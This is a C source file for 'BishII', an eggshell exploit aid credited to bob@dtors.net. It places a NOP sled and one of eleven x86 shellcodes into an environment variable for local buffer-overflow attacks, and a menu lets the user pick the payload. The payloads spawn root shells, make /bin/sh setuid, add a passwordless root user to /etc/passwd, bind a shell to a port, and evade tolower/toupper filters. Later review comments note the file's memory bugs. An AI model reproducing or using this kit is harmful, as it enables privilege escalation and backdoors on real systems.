/* BishII.c by bob@dtors.net
*
*
* Generic eggshell, was tested to
* work on:
*
* FreeBSD 4.6-PRERELEASE
* FreeBSD 4.5-RELEASE
* OpenBSD 3.0
* NetBSD  1.5.2
* Linux   2.0.36
* Linux   2.2.12-20
* Linux   2.2.16-22
* Linux   2.4.7-xfs
*
* BishII provides 11 different shellcodes to be loaded
* into the environment!
*
* Modified by mercy
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ANSI SGR colour escapes used by usage() and main() for the banner text. */
#define B  "\033[1;30m"
#define R  "\033[1;31m"
#define G  "\033[1;32m"
#define Y  "\033[1;33m"
#define RESTORE "\33[0;0m"   /* reset all attributes */

#define bash "/bin/bash"     /* shell spawned via system() on the bsdcode path of main() */
#define NOP 0x90             /* x86 single-byte NOP; main() fills the BISH buffer with it before the payload */
#define NOP_LENGTH 512       /* size of the stack buffer main() hands to putenv() */

/* Payload tables.  Each one is a machine-code blob stored as an ordinary C
 * string: the bytes are kept verbatim and the compiler appends the NUL that
 * main() relies on when it measures the selection with strlen().  A 0x00 byte
 * inside a table would therefore cut that measurement short.  decide() maps
 * the "0x01".."0x11" selectors to these arrays. */

/* aleph1's shellcode, execve() execution of /bin/sh */
char aleph1[]=
       "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* 28 byte version of /bin/sh by bob */
char shellcode[]=
		"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
		"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80";

/* 31 byte version of execve() /bin/ash then exit(); by bob */
char ashellcode[]=
		"\x31\xc0\x50\x68\x2f\x61\x73\x68\x68\x2f\x62\x69\x6e\x89"
            "\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
            "\x31\xc0\xb0\x01\xcd\x80";

/* Setuid(0,0) shellcode by bob */
char setuidcode[]=
		"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68"
            "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24"
            "\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01"
            "\xcd\x80";

/* makes /bin/sh suid by bob */
char chmodcode[]=
		"\x31\xc0\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68\x68\x2f"
            "\x2f\x62\x69\x89\xe3\x66\xb9\xfd\x09\xb0\x0f\xcd\x80\xb0"
            "\x01\xcd\x80";

/* Adds root account with no passwd to /etc/passwd, by bob */
char passwdcode[]=
		"\x31\xc0\x31\xdb\x31\xc9\x53\x68\x73\x73\x77\x64\x68\x63"
            "\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\x01\x04"
            "\xb0\x05\xcd\x80\x89\xc3\x31\xc0\x31\xd2\x68\x6e\x2f\x73"
            "\x68\x68\x2f\x2f\x62\x69\x68\x3a\x3a\x2f\x3a\x68\x3a\x30"
            "\x3a\x30\x68\x62\x6f\x62\x3a\x89\xe1\xb2\x14\xb0\x04\xcd"
            "\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

/* portbinding shellcode */
char portbinding[] =
	"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
	"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
	"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
	"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
	"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
	"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
	"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
	"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

/* tolower evasion and execve() execution of /bin/sh */
char tolowershellcode[] =
	"\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0"
	"\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff"
	"\xff/bin/sh";

/* toupper evasion and execve() execution of /bin/sh */
char touppershellcode[] =
	"\xeb\x29\x5e\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0"
	"\xfa\x29\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d"
	"\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\xd2\xff\xff\xff\x0f\x42\x49"
	"\x4e\x0f\x53\x48";

/* bsd, and linux shellcode by zillion */
char multicode[] =
        "\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
        "\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
        "\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
        "\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
        "\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
        "\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* BSD shellcode by eSDee of netric.org */
char bsdcode[]=
        "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd"
        "\x80\x31\xc0\xb0\x01\xcd\x80";

/* Forward declarations: decide() calls usage(), which is defined after it.
 * usage() ends in exit(0) and does not return to its caller. */
char *decide(char *string);
void usage(void);

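/* Map a selector string ("0x01" .. "0x11", as listed by usage()) to the
 * payload table it names.
 *
 * @param string  selector taken verbatim from argv[1]; NULL is tolerated and
 *                treated like an unknown selector.
 * @return        pointer to the selected NUL-terminated byte array.  For an
 *                unknown selector usage() is called; it exits the process, so
 *                the trailing NULL return is only reached if that ever changes.
 */
char *decide(char *string)
{
    /* Selector -> table, in the same order as the usage() menu.  The keys are
     * plain strings: "0x10" follows "0x09" with nothing in between. */
    static const struct {
        const char *key;
        char *code;
    } table[] = {
        { "0x01", aleph1 },
        { "0x02", shellcode },
        { "0x03", ashellcode },
        { "0x04", setuidcode },
        { "0x05", chmodcode },
        { "0x06", passwdcode },
        { "0x07", portbinding },
        { "0x08", tolowershellcode },
        { "0x09", touppershellcode },
        { "0x10", multicode },
        { "0x11", bsdcode },
    };

    if (string != NULL) {
        for (size_t i = 0; i < sizeof table / sizeof table[0]; i++) {
            if (strcmp(string, table[i].key) == 0) {
                return table[i].code;
            }
        }
    }

    /* Unknown selector: show the menu.  usage() exits, but the compiler cannot
     * see that, and the original version fell off the end of this non-void
     * function here (undefined behaviour); return NULL explicitly instead. */
    usage();
    return NULL;
}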

/* Print the selector menu, wrapped in the B colour escape and RESTORE, then
 * terminate the process with status 0.  Never returns to the caller. */
void usage(void){
    /* Body of the banner, one entry per line; puts() supplies the newline that
     * each line originally carried in its format string. */
    static const char *const menu[] = {
        "[*                                 *]",
        "[* Select shellcode to load  into  *]",
        "[* environment:                    *]",
        "[*                                 *]",
        "[* 0x01: Aleph1's Shellcode        *]",
        "[* 0x02: 28 byte Shellcode         *]",
        "[* 0x03: /bin/ash Shellcode        *]",
        "[* 0x04: Setuid() Shellcode        *]",
        "[* 0x05: Set /bin/sh suid          *]",
        "[* 0x06: Add user to /etc/passwd   *]",
        "[* 0x07: PortBinding shellcode     *]",
        "[* 0x08: tolower /bin/sh           *]",
        "[* 0x09: touppper /bin/sh          *]",
        "[* 0x10: MULTI-OS Shellcode        *]",
        "[* 0x11: BSD shellcode             *]",
        "[*                                 *]",
    };

    /* Title line carries the colour escape; footer restores the terminal. */
    printf("%s[*     BishII by bob@dtors.net     *]\n", B);
    for (size_t i = 0; i < sizeof menu / sizeof menu[0]; i++) {
        puts(menu[i]);
    }
    printf("[* http://bob.dtors.net          *]%s\n\n", RESTORE);
    exit(0);
}

/* Entry point: build the string "BISH=" + NOP padding + selected payload in a
 * stack buffer, publish it through putenv(), then hand control to a shell.
 *
 * @param argc/argv  argv[1] is the selector passed to decide(); with no
 *                   argument usage() prints the menu and exits.
 * @return           never returns normally: every path ends in exit() or
 *                   replaces the process image via execl().
 */
int main(int argc, char **argv)
{
  /* bish is NOT NUL-terminated anywhere below: memcpy() copies
   * strlen(selectcode) bytes without the terminator, and the last payload
   * byte lands exactly at bish[NOP_LENGTH-1].  Whoever walks the string
   * (putenv() or, later, the exec that copies the environment) therefore
   * reads past the end of the array until it meets a stray zero byte on the
   * stack — an out-of-bounds read, not a bug this comment fixes. */
  char *selectcode, bish[NOP_LENGTH];
  if(argc <= 1)
   usage();               /* usage() calls exit(0); nothing below runs */
  selectcode = (char *)decide(argv[1]);
  memset(bish,NOP,NOP_LENGTH);
  
  /* NOP_LENGTH-strlen(selectcode) is size_t arithmetic: a payload longer
   * than NOP_LENGTH would wrap to a huge index rather than be rejected (no
   * bounds check).  All tables in this file are well under 512 bytes. */
memcpy(&bish[NOP_LENGTH-strlen(selectcode)],selectcode,strlen(selectcode));
  memcpy(bish,"BISH=",5);   /* overwrites the first five NOPs; still no NUL */
  /* putenv() keeps a pointer to this automatic array rather than a copy (on
   * glibc at least), so it stays valid only because main() never returns
   * before exec/exit. */
  putenv(bish);
  fprintf(stdout, "%sBish %sloaded %sinto %senviroment%s\n", B, R, G, Y, 
RESTORE);
  if(selectcode == (char *)&bsdcode)
  {
    system(bash);
    exit(0);
   }
  /* NOTE(review): the literal "sh -i" is argv[0] of the new process, not a
   * separate "-i" argument, so no flag actually reaches the shell.  execl()
   * is also used without <unistd.h>, i.e. via an implicit declaration. */
  execl("/bin/sh", "sh -i", NULL);
  //system(bash); //take out comment for bsd and comment execl()
  exit(0);
}

